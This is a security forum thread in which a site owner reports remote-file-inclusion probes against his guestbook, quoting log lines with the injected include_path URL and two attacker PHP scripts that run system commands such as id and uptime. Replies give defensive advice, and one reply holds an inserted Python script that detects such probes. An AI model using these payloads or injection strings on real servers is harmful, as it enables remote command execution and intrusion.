Thread: Who's attacking the Wolfman?

  1. #1
    Senior Member wolfman1984's Avatar
    Join Date
    Aug 2007
    Location
    fangtastic.org
    Posts
    191

    Who's attacking the Wolfman?

    The Wolfman was reviewing my server logs today when I came across this:

    Code:
    //admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
    Http Code: 404 	Date: Jan 02 18:41:25 	Http Version: HTTP/1.1 	Size in Bytes: -	
    Referer: - Agent: libwww-perl/5.808
    67.15.175.50
    
    /gbook//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
    Http Code: 200 	Date: Jan 02 18:44:32 	Http Version: HTTP/1.1 	Size in Bytes: 4290
    Referer: - Agent: libwww-perl/5.808
    67.15.175.50
    It looks like someone has written a perl script that is testing my directories for the presence of an admin.php that is vulnerable to a parameter injection attack.

    The second attempt actually found my gbook directory which is used by my Ghoulbook. I'm guessing the script spidered my site for admin.php. For all admin.php files discovered, it attempted the injection.

    Here is the content of Goid.txt

    Code:
    <?
    echo "IndoServ<br>";
    $alb = @php_uname();
    $alb2 = system(uptime);
    $alb3 = system(id);
    $alb4 = @getcwd();
    $alb5 = getenv("SERVER_SOFTWARE");
    $alb6 = phpversion();
    $alb7 = $_SERVER['SERVER_NAME'];
    $alb8 = gethostbyname($SERVER_ADDR);
    $alb9 = get_current_user();
    $os = @PHP_OS;
    echo "os: $os<br>";
    echo "uname -a: $alb<br>";
    echo "uptime: $alb2<br>";
    echo "id: $alb3<br>";
    echo "pwd: $alb4<br>";
    echo "user: $alb9<br>";
    echo "phpv: $alb6<br>";
    echo "SoftWare: $alb5<br>";
    echo "ServerName: $alb7<br>";
    echo "ServerAddr: $alb8<br>";
    echo "IndoServ IRC NetWork<br>";
    exit;
    ?>
    It looks like Goid.txt is trying to display information about my server and my user account.

    http://thermair.co.uk/ is an air treatment company in the UK. They are probably unaware that their site is being used to harbour internet attacks against web servers.

    A search of the source IP address 67.15.175.50 shows that others have also been attacked.

    So here are my questions:

    1) Has anyone seen this before?
    2) Do you think the Wolfman should notify the Air Treatment company?

    Thanks
    I AM... THE WOLFMAN!!
    The Wolfman's Homepage: http://www.fangtastic.org
    Do you dig the Wolfman?? Sign his Ghoulbook or listen to him Howl

  2. #2
    Senior Member wolfman1984's Avatar
    Join Date
    Aug 2007
    Location
    fangtastic.org
    Posts
    191
    Here is another script being run against my server. I guess this is more popular than I first thought.

    Code:
    <?php
    echo "jimmywho";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;
    I AM... THE WOLFMAN!!
    The Wolfman's Homepage: http://www.fangtastic.org
    Do you dig the Wolfman?? Sign his Ghoulbook or listen to him Howl

  3. #3
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    Posts
    4,325
    Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.

    It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent, "libwww-perl/5.808". As always, stay current on your updates and check your logs.
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you've saved, how much you haven't smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.

  4. #4
    Senior Member
    Join Date
    Dec 2007
    Posts
    132
    There's a handful of things it could be. But whatever the person is using, the intent is the same. By the looks of it, the person/bot is just doing recon. The next step is attack. You should definitely whois the air company and inform the admin, and keep an eye on your logs. I'd ban the IP from my server.

    Also, online ip tracers are a very handy tool. If you enter that IP into one like http://visualiptrace.visualware.com, you'll see it traces back to Houston TX, and the ISP's number is 214-782-7802, and abuse contact is abuse@theplanet.com.

    Save your logs. Paired with the google results, your next step should be to contact the ISP's abuse dept and have that problem handled right there. Make it clear you have evidence (logs+results) that this person is intentionally scanning for vulnerabilities and actively trying to exploit them, otherwise they may just brush you off as another paranoid user.

  5. #5
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    When and if you do send an email to the abuse address, don't put your analysis in there. Just the plain facts (relevant sections of your logs) as clear text in the body (no attachments). And don't use HTML email.

    If you don't do it properly your abuse complaint may end up in the bitbucket.
    Oliver's Law:
    Experience is something you don't get until just after you need it.
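    The two things this thread asks for in practice are spotting records like the ones in the first post (a query parameter whose value is itself a URL, a 404 probe followed by a 200 on a real path, a scripted user agent) and, per the advice just above, turning only the relevant raw records into a plain-text excerpt for an abuse complaint. Below is an added Python example written for this thread; it is not code from any poster. The log layout copies the four-line format shown in the first post, but the records themselves are constructed, with RFC 5737 documentation addresses and an `.invalid` hostname in place of the real ones.

```python
"""Flag remote-file-inclusion (RFI) probes in access-log records and build a
plain-text, facts-only excerpt of the matching records for an abuse report.
Added example for this thread; the log records below are constructed and mirror
the four-line layout quoted in post #1 (request, status/date line, referer and
agent line, source IP), not real traffic."""
import re

SAMPLE_LOG = """\
//admin.php?include_path=http://example.invalid//media/logs/probe.txt??
Http Code: 404 \tDate: Jan 02 18:41:25 \tHttp Version: HTTP/1.1 \tSize in Bytes: -
Referer: - Agent: libwww-perl/5.808
192.0.2.10

/gbook//admin.php?include_path=http://example.invalid//media/logs/probe.txt??
Http Code: 200 \tDate: Jan 02 18:44:32 \tHttp Version: HTTP/1.1 \tSize in Bytes: 4290
Referer: - Agent: libwww-perl/5.808
192.0.2.10

/gbook/index.php?page=2
Http Code: 200 \tDate: Jan 02 18:50:01 \tHttp Version: HTTP/1.1 \tSize in Bytes: 8123
Referer: http://www.example.org/ Agent: Mozilla/5.0
198.51.100.7
"""

# A parameter value that is itself a remote URL is the RFI hallmark seen in the thread.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
FIELD_RE = re.compile(r"(Http Code|Date|Http Version|Size in Bytes): ([^\t]+)")


def parse_records(text):
    """Split the log into records; each record is the four-line block used above."""
    records = []
    for chunk in text.strip().split("\n\n"):
        lines = [ln.rstrip() for ln in chunk.splitlines()]
        if len(lines) != 4:
            continue  # skip anything that is not a complete record
        request, meta, ref_agent, ip = lines
        fields = {k: v.strip() for k, v in FIELD_RE.findall(meta)}
        agent = ref_agent.split("Agent:", 1)[1].strip() if "Agent:" in ref_agent else ""
        # Split the request by hand: the leading "//" would confuse urlsplit().
        path, _, query = request.partition("?")
        params = []
        for pair in query.split("&"):
            if pair:
                name, _, value = pair.partition("=")
                params.append((name, value))
        records.append({"raw": chunk, "path": path, "params": params,
                        "status": fields.get("Http Code", ""), "date": fields.get("Date", ""),
                        "agent": agent, "ip": ip.strip()})
    return records


def detect_rfi(records):
    """Return one finding per parameter whose value points at a remote URL.
    'served' marks responses with status 200: the path exists and something was
    returned, so that record deserves the closest look."""
    findings = []
    for rec in records:
        for name, value in rec["params"]:
            if value.lower().startswith(REMOTE_SCHEMES):
                findings.append({"ip": rec["ip"], "date": rec["date"], "path": rec["path"],
                                 "param": name, "target": value, "status": rec["status"],
                                 "agent": rec["agent"], "served": rec["status"] == "200",
                                 "raw": rec["raw"]})
    return findings


def abuse_report(findings):
    """Plain text only, no HTML and no analysis: a one-line summary of what was
    observed, the source address(es), then the raw matching records verbatim."""
    out = ["Suspected remote-file-inclusion probes observed in web server logs.",
           "Source IP(s): " + ", ".join(sorted({f["ip"] for f in findings})),
           "Raw log records follow.", ""]
    for f in findings:
        out.append(f["raw"])
        out.append("")
    return "\n".join(out)


if __name__ == "__main__":
    hits = detect_rfi(parse_records(SAMPLE_LOG))
    for h in hits:
        flag = "SERVED" if h["served"] else "not found"
        print(f"{h['ip']} {h['date']} {h['path']} {h['param']}={h['target']} [{flag}]")
    print()
    print(abuse_report(hits))
```

    Two notes on reading the output. A 200 on the second record only tells you the guestbook's admin.php exists and answered; whether the remote file was actually fetched and executed has to be confirmed from the application's own behaviour (and its version), not from the status code alone. And the report deliberately contains nothing but the summary line, the addresses, and the verbatim records, which is the shape the poster above recommends for an abuse mailbox.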

  6. #6
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003
    Location
    Australia.
    Posts
    2,391
    Quote Originally Posted by phishphreek
    Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.

    It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent, "libwww-perl/5.808". As always, stay current on your updates and check your logs.
    I will 2nd this.

    also do a whois on the IP as it is most likely a proxy.

  7. #7
    Elite Hacker
    Join Date
    Mar 2003
    Posts
    1,407
    I just ignore stuff like that. The only time you have to worry about it is if you're running the web application they're trying to exploit. I have fun collecting their remote include scripts though.

  8. #8
    Senior Member
    Join Date
    Dec 2007
    Posts
    132
    ^^ When it comes to your server's security, ignorance is not bliss.

  9. #9
    Senior Member wolfman1984's Avatar
    Join Date
    Aug 2007
    Location
    fangtastic.org
    Posts
    191
    Thanks everyone for the great advice. I've contacted the abuse team at theplanet.com, where the attack is coming from. Hopefully I will receive a response soon.
    I AM... THE WOLFMAN!!
    The Wolfman's Homepage: http://www.fangtastic.org
    Do you dig the Wolfman?? Sign his Ghoulbook or listen to him Howl